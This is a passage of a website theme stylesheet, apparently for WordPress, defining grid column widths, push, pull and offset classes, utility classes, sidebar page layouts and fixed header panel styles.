!important;\r\n}\r\n.sc_blogger.no_margins .row > [class*=\"column-\"], .sc_blogger.no_margins .columns_wrap > [class*=\"column-\"],\r\n.row.no_margins > [class*=\"column-\"], .columns_wrap.no_margins > [class*=\"column-\"] {\r\n\tpadding: 0 !important;\r\n}\r\n\r\n/* Columns width */\r\n.column-1, .column-1_1, .column-2_2, .column-3_3, .column-4_4, .column-5_5, .column-6_6, .column-7_7, .column-8_8, .column-9_9, .column-10_10, .column-11_11, .column-12_12\t{ width:100%; }\r\n.column-1_2, .column-2_4, .column-3_6, .column-4_8, .column-5_10, .column-6_12\t{ width:50%; }\r\n.column-1_3, .column-2_6, .column-3_9, .column-4_12\t\t\t\t\t\t\t\t{ width:33.33333333%; }\r\n.column-2_3, .column-4_6, .column-8_12\t\t\t\t\t\t\t\t\t\t\t{ width:66.66666667%; }\r\n.column-1_4, .column-2_8, .column-3_12\t\t\t\t\t\t\t\t\t\t\t{ width:25%; }\r\n.column-3_4, .column-6_8, .column-9_12\t\t\t\t\t\t\t\t\t\t\t{ width:75%; }\r\n.column-1_5, .column-2_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:20%; }\r\n.column-2_5, .column-4_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:40%; }\r\n.column-3_5, .column-6_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:60%; }\r\n.column-4_5, .column-8_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:80%; }\r\n.column-1_6, .column-2_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:16.66666667%; }\r\n.column-5_6, .column-10_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:83.33333333%; }\r\n.column-1_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:14.28571429%; }\r\n.column-2_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:28.57142857%; }\r\n.column-3_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:42.85714286%; }\r\n.column-4_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:57.14285714%; }\r\n.column-5_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:71.42857143%; }\r\n.column-6_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:85.71428571%; }\r\n.column-1_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:12.5%; }\r\n.column-3_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:37.5%; }\r\n.column-5_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:62.5%; }\r\n.column-7_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:87.5%; }\r\n.column-1_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:11.11111111%; }\r\n.column-2_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:22.22222222%; }\r\n.column-3_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:33.33333333%; }\r\n.column-4_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:44.44444444%; }\r\n.column-5_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:55.55555556%; }\r\n.column-6_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:66.66666667%; }\r\n.column-7_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:77.77777778%; }\r\n.column-8_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:88.88888889%; }\r\n.column-1_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:10%; }\r\n.column-3_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:30%; }\r\n.column-7_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:70%; }\r\n.column-9_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:90%; }\r\n.column-1_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width: 9.09090909%; }\r\n.column-2_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:18.18181818%; }\r\n.column-3_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:27.27272727%; }\r\n.column-4_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:36.36363636%; }\r\n.column-5_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:45.45454545%; }\r\n.column-6_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:54.54545455%; }\r\n.column-7_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:63.63636364%; }\r\n.column-8_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:72.72727273%; }\r\n.column-9_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:81.81818182%; }\r\n.column-10_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:90.90909091%; }\r\n.column-1_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width: 8.33333333%; }\r\n.column-5_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:41.66666667%; }\r\n.column-7_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:58.33333333%; }\r\n.column-11_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ width:91.66666667%; }\r\n/* Push columns */\r\n.push-1_2, .push-2_4, .push-3_6, .push-4_8, .push-5_10, .push-6_12\t{ left:50%; }\r\n.push-1_3, .push-2_6, .push-3_9, .push-4_12\t\t\t\t\t\t\t{ left:33.33333333%; }\r\n.push-2_3, .push-4_6, .push-8_12\t\t\t\t\t\t\t\t\t{ left:66.66666667%; }\r\n.push-1_4, .push-2_8, .push-3_12\t\t\t\t\t\t\t\t\t{ left:25%; }\r\n.push-3_4, .push-6_8, .push-9_12\t\t\t\t\t\t\t\t\t{ left:75%; }\r\n.push-1_5, .push-2_10\t\t\t\t\t\t\t\t\t\t\t\t{ left:20%; }\r\n.push-2_5, .push-4_10\t\t\t\t\t\t\t\t\t\t\t\t{ left:40%; }\r\n.push-3_5, .push-6_10\t\t\t\t\t\t\t\t\t\t\t\t{ left:60%; }\r\n.push-4_5, .push-8_10\t\t\t\t\t\t\t\t\t\t\t\t{ left:80%; }\r\n.push-1_6, .push-2_12\t\t\t\t\t\t\t\t\t\t\t\t{ left:16.66666667%; }\r\n.push-5_6, .push-10_12\t\t\t\t\t\t\t\t\t\t\t\t{ left:83.33333333%; }\r\n.push-1_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:14.28571429%; }\r\n.push-2_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:28.57142857%; }\r\n.push-3_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:42.85714286%; }\r\n.push-4_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:57.14285714%; }\r\n.push-5_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:71.42857143%; }\r\n.push-6_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:85.71428571%; }\r\n.push-1_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:12.5%; }\r\n.push-3_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:37.5%; }\r\n.push-5_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:62.5%; }\r\n.push-7_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:87.5%; }\r\n.push-1_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:11.11111111%; }\r\n.push-2_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:22.22222222%; }\r\n.push-3_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:33.33333333%; }\r\n.push-4_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:44.44444444%; }\r\n.push-5_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:55.55555556%; }\r\n.push-6_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:66.66666667%; }\r\n.push-7_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:77.77777778%; }\r\n.push-8_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:88.88888889%; }\r\n.push-1_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:10%; }\r\n.push-3_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:30%; }\r\n.push-7_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:70%; }\r\n.push-9_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:90%; }\r\n.push-1_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left: 9.09090909%; }\r\n.push-2_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:18.18181818%; }\r\n.push-3_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:27.27272727%; }\r\n.push-4_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:36.36363636%; }\r\n.push-5_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:45.45454545%; }\r\n.push-6_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:54.54545455%; }\r\n.push-7_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:63.63636364%; }\r\n.push-8_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:72.72727273%; }\r\n.push-9_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:81.81818182%; }\r\n.push-10_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:90.90909091%; }\r\n.push-1_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left: 8.33333333%; }\r\n.push-5_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:41.66666667%; }\r\n.push-7_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:58.33333333%; }\r\n.push-11_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ left:91.66666667%; }\r\n/* Pull columns */\r\n.pull-1_2, .pull-2_4, .pull-3_6, .pull-4_8, .pull-5_10, .pull-6_12\t{ right:50%; }\r\n.pull-1_3, .pull-2_6, .pull-3_9, .pull-4_12\t\t\t\t\t\t\t{ right:33.33333333%; }\r\n.pull-2_3, .pull-4_6, .pull-8_12\t\t\t\t\t\t\t\t\t{ right:66.66666667%; }\r\n.pull-1_4, .pull-2_8, .pull-3_12\t\t\t\t\t\t\t\t\t{ right:25%; }\r\n.pull-3_4, .pull-6_8, .pull-9_12\t\t\t\t\t\t\t\t\t{ right:75%; }\r\n.pull-1_5, .pull-2_10\t\t\t\t\t\t\t\t\t\t\t\t{ right:20%; }\r\n.pull-2_5, .pull-4_10\t\t\t\t\t\t\t\t\t\t\t\t{ right:40%; }\r\n.pull-3_5, .pull-6_10\t\t\t\t\t\t\t\t\t\t\t\t{ right:60%; }\r\n.pull-4_5, .pull-8_10\t\t\t\t\t\t\t\t\t\t\t\t{ right:80%; }\r\n.pull-1_6, .pull-2_12\t\t\t\t\t\t\t\t\t\t\t\t{ right:16.66666667%; }\r\n.pull-5_6, .pull-10_12\t\t\t\t\t\t\t\t\t\t\t\t{ right:83.33333333%; }\r\n.pull-1_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:14.28571429%; }\r\n.pull-2_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:28.57142857%; }\r\n.pull-3_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:42.85714286%; }\r\n.pull-4_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:57.14285714%; }\r\n.pull-5_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:71.42857143%; }\r\n.pull-6_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:85.71428571%; }\r\n.pull-1_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:12.5%; }\r\n.pull-3_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:37.5%; }\r\n.pull-5_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:62.5%; }\r\n.pull-7_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:87.5%; }\r\n.pull-1_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:11.11111111%; }\r\n.pull-2_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:22.22222222%; }\r\n.pull-3_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:33.33333333%; }\r\n.pull-4_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:44.44444444%; }\r\n.pull-5_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:55.55555556%; }\r\n.pull-6_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:66.66666667%; }\r\n.pull-7_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:77.77777778%; }\r\n.pull-8_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:88.88888889%; }\r\n.pull-1_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:10%; }\r\n.pull-3_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:30%; }\r\n.pull-7_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:70%; }\r\n.pull-9_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:90%; }\r\n.pull-1_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right: 9.09090909%; }\r\n.pull-2_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:18.18181818%; }\r\n.pull-3_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:27.27272727%; }\r\n.pull-4_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:36.36363636%; }\r\n.pull-5_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:45.45454545%; }\r\n.pull-6_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:54.54545455%; }\r\n.pull-7_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:63.63636364%; }\r\n.pull-8_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:72.72727273%; }\r\n.pull-9_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:81.81818182%; }\r\n.pull-10_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:90.90909091%; }\r\n.pull-1_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right: 8.33333333%; }\r\n.pull-5_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:41.66666667%; }\r\n.pull-7_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:58.33333333%; }\r\n.pull-11_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ right:91.66666667%; }\r\n/* Margin for the columns */\r\n.offset-1_2, .offset-2_4, .offset-3_6, .offset-4_8, .offset-5_10, .offset-6_12\t{ margin-left:50%; }\r\n.offset-1_3, .offset-2_6, .offset-3_9, .offset-4_12\t\t\t\t\t\t\t\t{ margin-left:33.33333333%; }\r\n.offset-2_3, .offset-4_6, .offset-8_12\t\t\t\t\t\t\t\t\t\t\t{ margin-left:66.66666667%; }\r\n.offset-1_4, .offset-2_8, .offset-3_12\t\t\t\t\t\t\t\t\t\t\t{ margin-left:25%; }\r\n.offset-3_4, .offset-6_8, .offset-9_12\t\t\t\t\t\t\t\t\t\t\t{ margin-left:75%; }\r\n.offset-1_5, .offset-2_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:20%; }\r\n.offset-2_5, .offset-4_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:40%; }\r\n.offset-3_5, .offset-6_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:60%; }\r\n.offset-4_5, .offset-8_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:80%; }\r\n.offset-1_6, .offset-2_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:16.66666667%; }\r\n.offset-5_6, .offset-10_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:83.33333333%; }\r\n.offset-1_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:14.28571429%; }\r\n.offset-2_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:28.57142857%; }\r\n.offset-3_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:42.85714286%; }\r\n.offset-4_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:57.14285714%; }\r\n.offset-5_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:71.42857143%; }\r\n.offset-6_7\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:85.71428571%; }\r\n.offset-1_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:12.5%; }\r\n.offset-3_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:37.5%; }\r\n.offset-5_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:62.5%; }\r\n.offset-7_8\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:87.5%; }\r\n.offset-1_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:11.11111111%; }\r\n.offset-2_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:22.22222222%; }\r\n.offset-3_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:33.33333333%; }\r\n.offset-4_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:44.44444444%; }\r\n.offset-5_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:55.55555556%; }\r\n.offset-6_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:66.66666667%; }\r\n.offset-7_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:77.77777778%; }\r\n.offset-8_9\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:88.88888889%; }\r\n.offset-1_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:10%; }\r\n.offset-3_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:30%; }\r\n.offset-7_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:70%; }\r\n.offset-9_10\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:90%; }\r\n.offset-1_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left: 9.09090909%; }\r\n.offset-2_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:18.18181818%; }\r\n.offset-3_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:27.27272727%; }\r\n.offset-4_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:36.36363636%; }\r\n.offset-5_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:45.45454545%; }\r\n.offset-6_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:54.54545455%; }\r\n.offset-7_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:63.63636364%; }\r\n.offset-8_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:72.72727273%; }\r\n.offset-9_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:81.81818182%; }\r\n.offset-10_11\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:90.90909091%; }\r\n.offset-1_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left: 8.33333333%; }\r\n.offset-5_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:41.66666667%; }\r\n.offset-7_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:58.33333333%; }\r\n.offset-11_12\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t{ margin-left:91.66666667%; }\r\n\r\n/* Utils */\r\n.clearfix:before,\r\n.clearfix:after,\r\n.container:before,\r\n.container:after,\r\n.container-fluid:before,\r\n.container-fluid:after,\r\n.row:before,\r\n.row:after,\r\n.columns_wrap:before,\r\n.columns_wrap:after {\r\n\tcontent: \" \";\r\n\tdisplay: block;\r\n}\r\n.clearfix:after,\r\n.container:after,\r\n.container-fluid:after,\r\n.row:after,\r\n.columns_wrap:after {\r\n\tclear: both;\r\n\twidth:100%;\r\n\theight:0;\r\n\tdisplay:block;\r\n}\r\n.center-block {\r\n\tdisplay: block;\r\n\tmargin-left: auto;\r\n\tmargin-right: auto;\r\n}\r\n.pull-right {\r\n\tfloat: right !important;\r\n}\r\n.pull-left {\r\n\tfloat: left !important;\r\n}\r\n\r\n.affix {\r\n\tposition: fixed;\r\n\t-webkit-transform: translate3d(0, 0, 0);\r\n\ttransform: translate3d(0, 0, 0);\r\n}\r\n\r\n.visible {\r\n\tvisibility: visible;\r\n}\r\n.invisible {\r\n\tvisibility: hidden;\r\n}\r\n\r\n.show {\r\n\tdisplay: block !important;\r\n}\r\n.hide {\r\n\tdisplay: none !important;\r\n}\r\n.hidden {\r\n\tdisplay: none !important;\r\n\tvisibility: hidden !important;\r\n}\r\n.text-hide {\r\n\tfont-size: 0;\r\n\tline-height: 0;\r\n\tcolor: transparent;\r\n\ttext-shadow: none;\r\n\tbackground-color: transparent;\r\n\tborder: 0;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n/* 6. Page layouts\r\n-------------------------------------------------------------- */\r\n.page_wrap,\r\n.content_wrap {\r\n\tmargin:0 auto;\r\n}\r\n.page_wrap{\r\n\toverflow: hidden;\r\n}\r\n\r\n.body_style_boxed .page_wrap {\r\n\twidth:1230px;\r\n\toverflow:hidden;\r\n}\r\n.slider_boxed,\r\n.content_wrap,\r\n.content_container {\r\n\twidth:1170px;\r\n\tmargin:0 auto;\r\n}\r\n/*\r\n.content_wrap .content_wrap,\r\n.content_wrap .content_container,\r\n.content_container .content_wrap,\r\n.content_container .content_container {\r\n\twidth:100%;\r\n}\r\n*/\r\n.content_wrap:after,\r\n.content_container:after {\r\n\tcontent:\" \";\r\n\tdisplay:block;\r\n\twidth:100%;\r\n\theight:0;\r\n\tclear:both;\r\n}\r\n.body_style_fullwide .content_wrap {\r\n\twidth: auto;\r\n\tpadding-left:30px;\r\n\tpadding-right:30px;\r\n}\r\n.content, .sidebar, .sidebar_inner {\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n\r\n/* Content and Sidebar */\r\n.sidebar_show .content { width: 870px; }\r\n.sidebar { \t\t\t\t width: 270px; }\r\n.sidebar_right .content { float: left; }\r\n.sidebar_right .sidebar { float: right; }\r\n.sidebar_left .content  { float: right; }\r\n.sidebar_left .sidebar  { float: left; }\r\n\r\n.sidebar_show.sidebar_right .content{\r\n\twidth: 760px; }\r\n\r\n.sidebar_right.woocommerce-page .content_wrap .content{\r\n\twidth: 870px;\r\n} \r\n\r\n.sidebar aside{\r\n\tpadding: 1.55em 1.8em;\r\n\t-webkit-border-radius: 5px;\r\n\t-moz-border-radius: 5px;\r\n\tborder-radius: 5px;\r\n\tbox-sizing: border-box;\r\n}\r\n\r\n.sidebar aside.widget_search .widget_title{\r\n\tmargin-bottom: 0;\r\n\tborder: none;\r\n}\r\n\r\n\r\n/* Fullwide or Fullscreen with sidebar */\r\n.body_style_fullwide.sidebar_show  .content, .body_style_fullscreen.sidebar_show  .content { width:auto; max-width:100%; }\r\n.body_style_fullwide.sidebar_right .content, .body_style_fullscreen.sidebar_right .content { padding-right: 410px; }\r\n.body_style_fullwide.sidebar_right .sidebar, .body_style_fullscreen.sidebar_right .sidebar { margin-left: -370px; }\r\n.body_style_fullwide.sidebar_left  .content, .body_style_fullscreen.sidebar_left  .content { padding-left:  410px; }\r\n.body_style_fullwide.sidebar_left  .sidebar, .body_style_fullscreen.sidebar_left  .sidebar { margin-right:-370px; }\r\n\r\n.body_style_fullscreen .page_content_wrap {\r\n\toverflow:hidden;\r\n\tpadding:0;\r\n}\r\n\r\n/* Transparent body */\r\n.body_transparent .page_wrap,\r\n.body_transparent .copy_wrap,\r\n.body_transparent .widget_area_inner {\r\n\tbackground-color: transparent;\r\n}\r\n\r\n/* Sidebar outer */\r\n.sidebar_outer {\r\n\twidth: 290px;\r\n\tposition: absolute;\r\n\ttop:0;\r\n\tbottom:0;\r\n\tz-index:99998;\r\n}\r\n.sidebar_outer_inner {\r\n\tposition: absolute;\r\n\ttop:0;\r\n\tbottom:0;\r\n\tleft: 0;\r\n\tright: 0;\r\n}\r\n.sidebar_outer_show .outer_wrap { \t\toverflow:hidden; position:relative; }\r\n.sidebar_outer_left .sidebar_outer {\tleft: 0; right: auto; }\r\n.sidebar_outer_left .body_wrap {\t\tpadding-left: 290px; }\r\n.sidebar_outer_right .sidebar_outer {\tleft: auto; right: 0; }\r\n.sidebar_outer_right .body_wrap {\t\tpadding-right: 290px; }\r\n\r\n/* Boxed style for articles and sidebar */\r\n.page_content_wrap {\r\n\tpadding: 4.84em 0;\r\n}\r\n.page_content_wrap.page_paddings_no,\r\n.body_style_fullscreen .page_content_wrap {\r\n\tpadding:0;\r\n}\r\n\r\n.article_style_boxed.layout_excerpt .content,\r\n.article_style_boxed[class*=\"single-\"] .content > article,\r\n.article_style_boxed[class*=\"single-\"] .content > .comments_wrap,{\r\n\tpadding: 2.1429em 2.8571em;\r\n}\r\n.body_style_fullscreen .content > article.page {\r\n\tpadding:0;\r\n}\r\n\r\n/* With video Background */\r\n.video_bg_show .body_wrap {\r\n\tposition:relative;\r\n}\r\n.video_bg_show .video_bg {\r\n\tposition:fixed;\r\n\tz-index:-1;\r\n\ttop:0;\r\n\tleft:0;\r\n\twidth:100%;\r\n\theight:100%;\r\n}\r\n.video_bg_show .video_bg_overlay:after {\r\n\tcontent: ' ';\r\n\tposition:absolute;\r\n\tleft:0;\r\n\ttop:0;\r\n\tbottom:0;\r\n\tright:0;\r\n\tbackground-color:rgba(0,0,0,0.3);\r\n\tz-index:3;\r\n\tbackground-image:url(images/bg/texture_7.png);\r\n}\r\n\r\n\r\n/* 7. Section's decorations\r\n-------------------------------------------------------------- */\r\n\r\n\r\n/* 7.1 Header\r\n-------------------------------------------------------------- */\r\n\r\n/* Top panel */\r\n.top_panel_wrap {\r\n\tposition:relative;\r\n}\r\n.top_panel_fixed .top_panel_wrap {\r\n\t-webkit-box-shadow: -4px 3px 0px 0px rgba(0, 0, 0, 0.2);\r\n\t-moz-box-shadow: -4px 3px 0px 0px rgba(0, 0, 0, 0.2);\r\n\tbox-shadow: -4px 3px 0px 0px rgba(0, 0, 0, 0.2);\t\r\n}\r\n.top_panel_over .top_panel_wrap {\r\n\tposition:absolute;\r\n\ttop:0;\r\n\tleft:0;\r\n\tright:0;\r\n\tz-index:10000;\r\n}\r\nbody:not(.top_panel_fixed) .top_panel_position_over.top_panel_wrap_inner,\r\nbody:not(.top_panel_fixed) .top_panel_position_over .top_panel_top,\r\nbody:not(.top_panel_fixed) .top_panel_position_over .top_panel_middle,\r\nbody:not(.top_panel_fixed) .top_panel_position_over .top_panel_bottom {\r\n\tbackground: rgba(19, 16, 38, 0.8);\r\n}\r\n\r\n.top_panel_over.top_panel_fixed .top_panel_position_over.top_panel_wrap_inner{\r\n\tbackground: rgba(19, 16, 38, 0.8);\r\n}\r\n\r\n\r\n.admin-bar.top_panel_over .top_panel_wrap {\r\n\ttop:32px;\r\n}\r\n.top_panel_wrap [class^=\"icon-\"]::before, .top_panel_wrap [class*=\" icon-\"]::before {\r\n\tmargin-right:0.5em;\r\n}\r\n#wpadminbar {\r\n\toverflow:hidden;\r\n}\r\n\r\n\r\n/* Fixed panel */\r\n.top_panel_fixed_wrap {\r\n\tdisplay:none;\r\n}\r\n.top_panel_fixed:not(.top_panel_over) .top_panel_fixed_wrap {\r\n\tdisplay:block;\r\n}\r\n.top_panel_fixed .top_panel_wrap {\r\n\tposition:fixed;\r\n\ttop:0;\r\n\tleft:0;\r\n\tright:0;\r\n\tz-index:10000;\r\n}\r\n.sidebar_outer_left.top_panel_fixed .top_panel_wrap {\r\n\tleft:290px;\r\n}\r\n.sidebar_outer_right.top_panel_fixed .top_panel_wrap {\r\n\tright:290px;\r\n}\r\n.top_panel_fixed .top_panel_top,\r\n.top_panel_fixed .top_panel_style_1 .top_panel_middle,\r\n.top_panel_fixed .top_panel_style_2 .top_panel_middle 